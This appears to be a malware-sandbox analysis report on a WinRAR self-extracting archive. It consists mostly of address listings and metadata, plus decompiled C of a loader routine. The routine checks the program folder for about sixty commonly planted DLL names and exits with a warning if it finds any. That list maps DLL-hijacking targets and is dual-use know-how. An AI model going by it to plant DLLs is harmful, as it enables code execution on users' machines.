                                                                                                                0x00ed0a8c
                                                                                                                0x00ed0a8c
                                                                                                                0x00ed0a92
                                                                                                                0x00ed0a9d
                                                                                                                0x00ed0a9d
                                                                                                                0x00ed0aa3
                                                                                                                0x00ed0aae
                                                                                                                0x00ed0abf
                                                                                                                0x00ed0ad7
                                                                                                                0x00000000
                                                                                                                0x00ed0ad7
                                                                                                                0x00ed0aa5
                                                                                                                0x00ed0aac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0aac
                                                                                                                0x00ed0a94
                                                                                                                0x00ed0a9b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0adc
                                                                                                                0x00ed0adc
                                                                                                                0x00ed0add
                                                                                                                0x00ed0add
                                                                                                                0x00ed0ae5
                                                                                                                0x00ed0aff
                                                                                                                0x00ed0b04
                                                                                                                0x00000000
                                                                                                                0x00ed09ac
                                                                                                                0x00ed09ac
                                                                                                                0x00ed09ae
                                                                                                                0x00ed09b4
                                                                                                                0x00ed09b5
                                                                                                                0x00ed09ba
                                                                                                                0x00ed09bf
                                                                                                                0x00ed09c1
                                                                                                                0x00ed09c3
                                                                                                                0x00ed09ca
                                                                                                                0x00ed09cc
                                                                                                                0x00ed09e0
                                                                                                                0x00ed09eb
                                                                                                                0x00ed09f0
                                                                                                                0x00ed09f0
                                                                                                                0x00ed09ca
                                                                                                                0x00ed09f1
                                                                                                                0x00ed09f7
                                                                                                                0x00ed0a4a
                                                                                                                0x00ed0a4a
                                                                                                                0x00ed0a4b
                                                                                                                0x00ed0a51
                                                                                                                0x00ed0a52
                                                                                                                0x00000000
                                                                                                                0x00ed09f9
                                                                                                                0x00ed09fa
                                                                                                                0x00ed0a00
                                                                                                                0x00ed0a06
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0a08
                                                                                                                0x00ed0a0f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0a11
                                                                                                                0x00ed0a13
                                                                                                                0x00ed0a19
                                                                                                                0x00ed0a1a
                                                                                                                0x00ed0a1f
                                                                                                                0x00ed0a26
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0a3c
                                                                                                                0x00ed0a42
                                                                                                                0x00ed0a44
                                                                                                                0x00ed032b
                                                                                                                0x00ed032b
                                                                                                                0x00ed0331
                                                                                                                0x00ed0331
                                                                                                                0x00ed0256
                                                                                                                0x00ed0257
                                                                                                                0x00ed0b7f
                                                                                                                0x00ed0b7f
                                                                                                                0x00ed0b81
                                                                                                                0x00ed0b87
                                                                                                                0x00ed0b91
                                                                                                                0x00ed0b91
                                                                                                                0x00000000
                                                                                                                0x00ed0a44
                                                                                                                0x00ed09f7
                                                                                                                0x00ed09a6
                                                                                                                0x00ed01ec
                                                                                                                0x00ed01ef
                                                                                                                0x00ed0203
                                                                                                                0x00ed0203
                                                                                                                0x00000000
                                                                                                                0x00ed0203
                                                                                                                0x00ed01f4
                                                                                                                0x00ed01f4
                                                                                                                0x00ed01f7
                                                                                                                0x00ed0262
                                                                                                                0x00ed0269
                                                                                                                0x00ed0301
                                                                                                                0x00ed0310
                                                                                                                0x00ed0316
                                                                                                                0x00ed031d
                                                                                                                0x00ed0337
                                                                                                                0x00ed033e
                                                                                                                0x00ed035a
                                                                                                                0x00ed035c
                                                                                                                0x00ed0362
                                                                                                                0x00ed036d
                                                                                                                0x00ed037f
                                                                                                                0x00ed037f
                                                                                                                0x00ed0386
                                                                                                                0x00ed038c
                                                                                                                0x00ed0393
                                                                                                                0x00ed03ad
                                                                                                                0x00ed03c1
                                                                                                                0x00ed03ce
                                                                                                                0x00ed03f1
                                                                                                                0x00ed03f6
                                                                                                                0x00ed03ff
                                                                                                                0x00ed0400
                                                                                                                0x00ed0401
                                                                                                                0x00ed0395
                                                                                                                0x00ed039f
                                                                                                                0x00ed03a0
                                                                                                                0x00ed03a1
                                                                                                                0x00ed03a6
                                                                                                                0x00ed03a6
                                                                                                                0x00ed0406
                                                                                                                0x00ed040d
                                                                                                                0x00ed0416
                                                                                                                0x00ed0416
                                                                                                                0x00ed041b
                                                                                                                0x00ed0424
                                                                                                                0x00ed0425
                                                                                                                0x00ed0428
                                                                                                                0x00ed042f
                                                                                                                0x00ed0430
                                                                                                                0x00ed0432
                                                                                                                0x00ed0449
                                                                                                                0x00ed0455
                                                                                                                0x00ed0457
                                                                                                                0x00ed045a
                                                                                                                0x00ed045c
                                                                                                                0x00ed0473
                                                                                                                0x00ed0473
                                                                                                                0x00ed0476
                                                                                                                0x00ed0476
                                                                                                                0x00ed047c
                                                                                                                0x00ed047e
                                                                                                                0x00ed04ed
                                                                                                                0x00ed04ed
                                                                                                                0x00ed04f1
                                                                                                                0x00ed0731
                                                                                                                0x00ed0737
                                                                                                                0x00ed0741
                                                                                                                0x00ed0753
                                                                                                                0x00ed075d
                                                                                                                0x00ed076a
                                                                                                                0x00ed0779
                                                                                                                0x00ed077b
                                                                                                                0x00ed077d
                                                                                                                0x00ed0788
                                                                                                                0x00ed0788
                                                                                                                0x00ed0791
                                                                                                                0x00ed0791
                                                                                                                0x00ed0797
                                                                                                                0x00ed0799
                                                                                                                0x00ed079f
                                                                                                                0x00ed07a0
                                                                                                                0x00ed07a5
                                                                                                                0x00ed07a7
                                                                                                                0x00ed07ad
                                                                                                                0x00ed07ae
                                                                                                                0x00ed07b3
                                                                                                                0x00ed07b8
                                                                                                                0x00ed07b9
                                                                                                                0x00ed07bf
                                                                                                                0x00ed07c4
                                                                                                                0x00ed07c6
                                                                                                                0x00ed07cc
                                                                                                                0x00ed07d3
                                                                                                                0x00ed07d4
                                                                                                                0x00ed07d9
                                                                                                                0x00ed07e0
                                                                                                                0x00ed07e2
                                                                                                                0x00ed07e9
                                                                                                                0x00ed07eb
                                                                                                                0x00ed07f2
                                                                                                                0x00ed07f4
                                                                                                                0x00ed07f6
                                                                                                                0x00ed07fc
                                                                                                                0x00ed07fd
                                                                                                                0x00ed07fd
                                                                                                                0x00ed07f2
                                                                                                                0x00ed07e9
                                                                                                                0x00ed0805
                                                                                                                0x00ed080a
                                                                                                                0x00ed080a
                                                                                                                0x00ed0811
                                                                                                                0x00000000
                                                                                                                0x00ed0811
                                                                                                                0x00ed04f7
                                                                                                                0x00ed04fe
                                                                                                                0x00ed04fe
                                                                                                                0x00ed0501
                                                                                                                0x00ed0501
                                                                                                                0x00ed0503
                                                                                                                0x00ed0507
                                                                                                                0x00ed0509
                                                                                                                0x00ed06c7
                                                                                                                0x00ed06c7
                                                                                                                0x00ed06cb
                                                                                                                0x00ed06db
                                                                                                                0x00ed06f4
                                                                                                                0x00ed0702
                                                                                                                0x00ed071c
                                                                                                                0x00ed0721
                                                                                                                0x00ed0721
                                                                                                                0x00ed0254
                                                                                                                0x00ed0254
                                                                                                                0x00000000
                                                                                                                0x00ed0254
                                                                                                                0x00ed0519
                                                                                                                0x00ed051f
                                                                                                                0x00ed052a
                                                                                                                0x00ed052f
                                                                                                                0x00ed0530
                                                                                                                0x00ed0535
                                                                                                                0x00ed0552
                                                                                                                0x00ed0557
                                                                                                                0x00ed055a
                                                                                                                0x00ed0567
                                                                                                                0x00ed056e
                                                                                                                0x00ed0577
                                                                                                                0x00ed058f
                                                                                                                0x00ed0592
                                                                                                                0x00ed0599
                                                                                                                0x00ed059c
                                                                                                                0x00ed059f
                                                                                                                0x00ed05ac
                                                                                                                0x00ed05ae
                                                                                                                0x00ed05b1
                                                                                                                0x00ed05b3
                                                                                                                0x00ed063e
                                                                                                                0x00ed05b9
                                                                                                                0x00ed05b9
                                                                                                                0x00ed05c0
                                                                                                                0x00ed05c6
                                                                                                                0x00ed05c8
                                                                                                                0x00ed05d5
                                                                                                                0x00ed05d5
                                                                                                                0x00ed05e1
                                                                                                                0x00ed05ed
                                                                                                                0x00ed05f9
                                                                                                                0x00ed0604
                                                                                                                0x00ed060b
                                                                                                                0x00ed0610
                                                                                                                0x00ed062e
                                                                                                                0x00ed0631
                                                                                                                0x00ed0636
                                                                                                                0x00ed0636
                                                                                                                0x00ed0645
                                                                                                                0x00ed0659
                                                                                                                0x00ed066a
                                                                                                                0x00ed066f
                                                                                                                0x00ed0671
                                                                                                                0x00ed06ab
                                                                                                                0x00ed06ae
                                                                                                                0x00000000
                                                                                                                0x00ed0673
                                                                                                                0x00ed067b
                                                                                                                0x00ed0681
                                                                                                                0x00ed0681
                                                                                                                0x00ed0681
                                                                                                                0x00ed0685
                                                                                                                0x00ed0688
                                                                                                                0x00ed0688
                                                                                                                0x00ed068b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed068f
                                                                                                                0x00ed0698
                                                                                                                0x00ed0699
                                                                                                                0x00ed069c
                                                                                                                0x00ed069f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed069f
                                                                                                                0x00ed06a4
                                                                                                                0x00ed06b1
                                                                                                                0x00ed06b1
                                                                                                                0x00ed06b5
                                                                                                                0x00ed06b8
                                                                                                                0x00ed06c1
                                                                                                                0x00ed06c1
                                                                                                                0x00000000
                                                                                                                0x00ed06b5
                                                                                                                0x00ed0671
                                                                                                                0x00ed0480
                                                                                                                0x00ed0482
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0498
                                                                                                                0x00ed049d
                                                                                                                0x00ed04a6
                                                                                                                0x00ed04ab
                                                                                                                0x00ed04b5
                                                                                                                0x00ed04b7
                                                                                                                0x00ed04be
                                                                                                                0x00ed04c3
                                                                                                                0x00ed04c6
                                                                                                                0x00ed04c8
                                                                                                                0x00ed04ca
                                                                                                                0x00ed04d0
                                                                                                                0x00ed04d3
                                                                                                                0x00ed04d5
                                                                                                                0x00ed04d5
                                                                                                                0x00ed04d3
                                                                                                                0x00ed04d8
                                                                                                                0x00ed04d8
                                                                                                                0x00ed04d8
                                                                                                                0x00ed04e2
                                                                                                                0x00ed04e7
                                                                                                                0x00000000
                                                                                                                0x00ed04e7
                                                                                                                0x00ed045e
                                                                                                                0x00ed0464
                                                                                                                0x00ed0467
                                                                                                                0x00ed046a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed046c
                                                                                                                0x00ed046e
                                                                                                                0x00000000
                                                                                                                0x00ed0434
                                                                                                                0x00ed0434
                                                                                                                0x00ed043a
                                                                                                                0x00ed043d
                                                                                                                0x00ed0444
                                                                                                                0x00ed0446
                                                                                                                0x00000000
                                                                                                                0x00ed0446
                                                                                                                0x00ed043f
                                                                                                                0x00ed0442
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0442
                                                                                                                0x00ed0340
                                                                                                                0x00ed0342
                                                                                                                0x00ed0343
                                                                                                                0x00ed0345
                                                                                                                0x00ed0816
                                                                                                                0x00ed0816
                                                                                                                0x00ed081d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0823
                                                                                                                0x00ed0825
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0830
                                                                                                                0x00ed083e
                                                                                                                0x00ed0844
                                                                                                                0x00ed084a
                                                                                                                0x00ed084d
                                                                                                                0x00ed0858
                                                                                                                0x00ed0862
                                                                                                                0x00ed0862
                                                                                                                0x00ed0867
                                                                                                                0x00ed086a
                                                                                                                0x00ed084f
                                                                                                                0x00ed084f
                                                                                                                0x00ed084f
                                                                                                                0x00ed0873
                                                                                                                0x00ed0881
                                                                                                                0x00000000
                                                                                                                0x00ed0881
                                                                                                                0x00ed033e
                                                                                                                0x00ed0321
                                                                                                                0x00ed0322
                                                                                                                0x00ed0329
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0329
                                                                                                                0x00ed026f
                                                                                                                0x00ed0276
                                                                                                                0x00000000
                                                                                                                0x00ed027c
                                                                                                                0x00ed027c
                                                                                                                0x00ed0283
                                                                                                                0x00ed0288
                                                                                                                0x00ed028a
                                                                                                                0x00ed0299
                                                                                                                0x00ed02a1
                                                                                                                0x00ed02a4
                                                                                                                0x00ed02f3
                                                                                                                0x00ed02f3
                                                                                                                0x00ed02fa
                                                                                                                0x00ed02fc
                                                                                                                0x00ed02fc
                                                                                                                0x00ed02ac
                                                                                                                0x00ed02b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed02c2
                                                                                                                0x00ed02c8
                                                                                                                0x00ed02ca
                                                                                                                0x00000000
                                                                                                                0x00ed02d0
                                                                                                                0x00ed02d5
                                                                                                                0x00ed02db
                                                                                                                0x00ed02dd
                                                                                                                0x00ed02e3
                                                                                                                0x00ed02ed
                                                                                                                0x00ed02ed
                                                                                                                0x00000000
                                                                                                                0x00ed02dd
                                                                                                                0x00ed02ca
                                                                                                                0x00000000
                                                                                                                0x00ed02f3
                                                                                                                0x00ed0276
                                                                                                                0x00ed01f9
                                                                                                                0x00ed01f9
                                                                                                                0x00ed01fc
                                                                                                                0x00ed0237
                                                                                                                0x00ed0238
                                                                                                                0x00ed023f
                                                                                                                0x00ed0245
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0247
                                                                                                                0x00ed024e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed024e
                                                                                                                0x00ed01fe
                                                                                                                0x00ed0201
                                                                                                                0x00ed021a
                                                                                                                0x00ed021f
                                                                                                                0x00ed0221
                                                                                                                0x00ed022d
                                                                                                                0x00ed022d
                                                                                                                0x00000000
                                                                                                                0x00ed0221
                                                                                                                0x00000000
                                                                                                                0x00ed0201
                                                                                                                0x00ed01d8
                                                                                                                0x00ed01da
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00ED01A5
                                                                                                                  • Part of subcall function 00EC11DA: GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                  • Part of subcall function 00EC11DA: SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prologItemTextWindow
                                                                                                                • String ID: Ht>*$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                • API String ID: 810644672-2965685607
                                                                                                                • Opcode ID: cb92625c76a235cf25a22a5caabc26640bfd324934d963a7239697cc49cbe957
                                                                                                                • Instruction ID: 7ae19332197d8b22280aa273f4e6468caf73794b63a62ae089dfb124f060c7eb
                                                                                                                • Opcode Fuzzy Hash: cb92625c76a235cf25a22a5caabc26640bfd324934d963a7239697cc49cbe957
                                                                                                                • Instruction Fuzzy Hash: 0642577194424CBEEB21EB609D59FBE3BBCEB01704F04215AF240B62D2C7794D46EB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC6A40, Relevance: 100.1, APIs: 22, Strings: 35, Instructions: 317libraryfileloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00EC6A40(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00ED3370();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0xef1004; // 0xee77a8
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E00EC674F( &_a9156, E00EC36C4(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E00EC2B26() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00EC69F6( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E00EC377F(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E00EC370E(_t234,  &_a764);
										if(E00EC2B26() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E00EC37E6( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E00ED8683( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00EC69F6(L"dwmapi.dll");
											E00EC69F6(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E00EC37E6( &_a4848, 0x864, E00EC4A3C(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00ECF2B3(0,  &_a4844, E00EC4A3C(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E00EC377F(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E00EDC144(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E00EC6493(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00EC69F6( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0xee7220( ~(_t180 & 0x000000ff) & 0x00ee7544);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0xee7220(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}
























                                                                                                                0x00ec6a45
                                                                                                                0x00ec6a4b
                                                                                                                0x00ec6a53
                                                                                                                0x00ec6a5b
                                                                                                                0x00ec6a5f
                                                                                                                0x00ec6ac5
                                                                                                                0x00ec6ac5
                                                                                                                0x00ec6aca
                                                                                                                0x00ec6acd
                                                                                                                0x00ec6ad5
                                                                                                                0x00ec6ada
                                                                                                                0x00ec6ae2
                                                                                                                0x00ec6aed
                                                                                                                0x00ec6af5
                                                                                                                0x00ec6afd
                                                                                                                0x00ec6b05
                                                                                                                0x00ec6b0d
                                                                                                                0x00ec6b15
                                                                                                                0x00ec6b1d
                                                                                                                0x00ec6b25
                                                                                                                0x00ec6b2d
                                                                                                                0x00ec6b35
                                                                                                                0x00ec6b3d
                                                                                                                0x00ec6b45
                                                                                                                0x00ec6b4d
                                                                                                                0x00ec6b55
                                                                                                                0x00ec6b5d
                                                                                                                0x00ec6b65
                                                                                                                0x00ec6b6d
                                                                                                                0x00ec6b75
                                                                                                                0x00ec6b7d
                                                                                                                0x00ec6b85
                                                                                                                0x00ec6b8d
                                                                                                                0x00ec6b95
                                                                                                                0x00ec6b9d
                                                                                                                0x00ec6ba5
                                                                                                                0x00ec6bad
                                                                                                                0x00ec6bb8
                                                                                                                0x00ec6bc3
                                                                                                                0x00ec6bce
                                                                                                                0x00ec6bd9
                                                                                                                0x00ec6be4
                                                                                                                0x00ec6bef
                                                                                                                0x00ec6bfa
                                                                                                                0x00ec6c05
                                                                                                                0x00ec6c10
                                                                                                                0x00ec6c1b
                                                                                                                0x00ec6c26
                                                                                                                0x00ec6c31
                                                                                                                0x00ec6c3c
                                                                                                                0x00ec6c47
                                                                                                                0x00ec6c52
                                                                                                                0x00ec6c5d
                                                                                                                0x00ec6c68
                                                                                                                0x00ec6c73
                                                                                                                0x00ec6c7e
                                                                                                                0x00ec6c89
                                                                                                                0x00ec6c94
                                                                                                                0x00ec6c9f
                                                                                                                0x00ec6caa
                                                                                                                0x00ec6cb5
                                                                                                                0x00ec6cc0
                                                                                                                0x00ec6ccb
                                                                                                                0x00ec6cd6
                                                                                                                0x00ec6ce1
                                                                                                                0x00ec6cec
                                                                                                                0x00ec6cf7
                                                                                                                0x00ec6d02
                                                                                                                0x00ec6d0d
                                                                                                                0x00ec6d18
                                                                                                                0x00ec6d23
                                                                                                                0x00ec6df5
                                                                                                                0x00ec6e00
                                                                                                                0x00ec6e1d
                                                                                                                0x00ec6e22
                                                                                                                0x00ec6e24
                                                                                                                0x00ec6e26
                                                                                                                0x00ec6e30
                                                                                                                0x00ec6e3d
                                                                                                                0x00ec6e3d
                                                                                                                0x00ec6e32
                                                                                                                0x00ec6e36
                                                                                                                0x00ec6e36
                                                                                                                0x00ec6e41
                                                                                                                0x00ec6e63
                                                                                                                0x00ec6e63
                                                                                                                0x00ec6e74
                                                                                                                0x00ec6e81
                                                                                                                0x00ec6e89
                                                                                                                0x00ec6e93
                                                                                                                0x00ec6e97
                                                                                                                0x00ec6e99
                                                                                                                0x00ec6ed1
                                                                                                                0x00ec6ed1
                                                                                                                0x00ec6ed3
                                                                                                                0x00ec6fea
                                                                                                                0x00ec6fea
                                                                                                                0x00ec6ee1
                                                                                                                0x00ec6ef0
                                                                                                                0x00ec6f5f
                                                                                                                0x00ec6f67
                                                                                                                0x00ec6f7b
                                                                                                                0x00ec6f80
                                                                                                                0x00ec6f83
                                                                                                                0x00ec6f89
                                                                                                                0x00ec6f8b
                                                                                                                0x00ec6f94
                                                                                                                0x00ec6fa9
                                                                                                                0x00ec6fc1
                                                                                                                0x00ec6fcc
                                                                                                                0x00ec6fd2
                                                                                                                0x00ec6fd2
                                                                                                                0x00ec6ef2
                                                                                                                0x00ec6ef7
                                                                                                                0x00ec6f01
                                                                                                                0x00ec6f0d
                                                                                                                0x00ec6f15
                                                                                                                0x00ec6f2f
                                                                                                                0x00ec6f34
                                                                                                                0x00ec6f4e
                                                                                                                0x00ec6f4e
                                                                                                                0x00ec6fda
                                                                                                                0x00ec6fda
                                                                                                                0x00ec6e9b
                                                                                                                0x00ec6e9d
                                                                                                                0x00ec6e9d
                                                                                                                0x00ec6eae
                                                                                                                0x00ec6ebb
                                                                                                                0x00ec6ec3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6ec5
                                                                                                                0x00ec6ec9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6ecb
                                                                                                                0x00ec6ecd
                                                                                                                0x00000000
                                                                                                                0x00ec6ecd
                                                                                                                0x00ec6e43
                                                                                                                0x00ec6e58
                                                                                                                0x00ec6e5e
                                                                                                                0x00ec6e61
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6e61
                                                                                                                0x00ec6e8b
                                                                                                                0x00ec6e8b
                                                                                                                0x00ec6e8c
                                                                                                                0x00000000
                                                                                                                0x00ec6e91
                                                                                                                0x00ec6d2f
                                                                                                                0x00ec6d31
                                                                                                                0x00ec6d34
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6d45
                                                                                                                0x00ec6d67
                                                                                                                0x00ec6d6b
                                                                                                                0x00ec6de9
                                                                                                                0x00ec6dea
                                                                                                                0x00ec6df0
                                                                                                                0x00000000
                                                                                                                0x00ec6d7d
                                                                                                                0x00ec6d92
                                                                                                                0x00ec6d98
                                                                                                                0x00ec6d9a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec6da2
                                                                                                                0x00ec6da4
                                                                                                                0x00ec6da9
                                                                                                                0x00ec6db8
